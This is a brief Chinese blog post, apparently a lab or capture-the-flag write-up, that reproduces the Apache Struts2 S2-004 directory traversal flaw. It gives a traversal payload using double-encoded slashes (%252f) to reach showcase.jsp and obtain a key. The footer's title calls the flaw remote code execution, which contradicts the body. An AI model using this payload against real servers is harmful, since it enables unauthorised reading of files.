S2-004存在目录遍历
s2-004是目录遍历漏洞。可通过…/返回上个目录。把/做二次url编码为%252f
payload
..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp根据提示拿到key
声明:
本文采用
BY-NC-SA
协议进行授权,如无注明均为原创,转载请注明转自
运维那些事
本文地址: Apache Struts2远程代码执行漏洞(S2-004)复现
本文地址: Apache Struts2远程代码执行漏洞(S2-004)复现
